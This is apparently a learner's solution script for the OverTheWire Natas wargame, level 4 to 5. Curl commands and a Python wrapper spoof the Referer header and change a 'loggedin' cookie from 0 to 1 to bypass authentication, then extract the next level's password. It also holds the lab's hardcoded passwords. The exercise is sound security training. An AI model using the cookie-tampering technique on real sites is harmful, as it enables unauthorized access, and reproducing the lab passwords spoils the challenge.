# Natas Level 4 → Level 5
# Username: natas5
# URL:      http://natas5.natas.labs.overthewire.org

# password for natas5 is 0n35PkggAPm2zbEpOU802c0x0Msn1ToK

# the below command won't work
# curl -u  natas5:0n35PkggAPm2zbEpOU802c0x0Msn1ToK -H 'Referer: http://natas6.natas.labs.overthewire.org/' http://natas5.natas.labs.overthewire.org/
# after senning random request relaised iu could save the cookie using -c

# curl  -c natas_5_cookies.txt -u natas5:0n35PkggAPm2zbEpOU802c0x0Msn1ToK -H 'Referer: http://natas4.natas.labs.overthewire.org/' http://natas5.natas.labs.overthewire.org/


# data inside the cookies 

# ---------------------------
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

# natas5.natas.labs.overthewire.org	FALSE	/	FALSE	0	loggedin	0
# --------------------

# just change the loggedin 0 to 1 and send hack the cookie using -b 

# curl  -b natas_5_cookies.txt -u natas5:0n35PkggAPm2zbEpOU802c0x0Msn1ToK -H 'Referer: http://natas4.natas.labs.overthewire.org/' http://natas5.natas.labs.overthewire.org/



import subprocess
import sys

import re

def main():
    # -s means silent we don't require , -b means send the cusotm cooklie you can also save the incoming cookie using -c filename
    command="curl  -b natas_5_cookies.txt -u natas5:0n35PkggAPm2zbEpOU802c0x0Msn1ToK -H 'Referer: http://natas4.natas.labs.overthewire.org/' http://natas5.natas.labs.overthewire.org/"
    try:
        # sspawn that shell to run it
        result=subprocess.run(
            command,
            shell=True,
            capture_output=True,
            text=True,
            check=True
        )

        if result.stdout:
            # extract the password form the entire html
            match = re.search(r'password for natas6 is ([A-Za-z0-98]+)', result.stdout)
            # print(match)
            print(match.group(0))
            # Remove shell whitespaces plls
            # print(result.stdout.strip())
        else :
            print("No results found")
    # error handling not needed but still
    except subprocess.CalledProcessError as e:
        print(f"Command faiiled with exit code {e.returncode}")
        if e.stderr:
            print(f"Error : {e.stderr}")
        sys.exit(1) # need to exit the spawneed shell or it takes memeory
    except FileNotFoundError :
       print("Error: curl might be uninstalled or file not there")
       sys.exit(1) 



if __name__=="__main__":
    main()    

# password for natas6 is 0RoJwHdSKWFTYR5WuiAewauSuNaBXned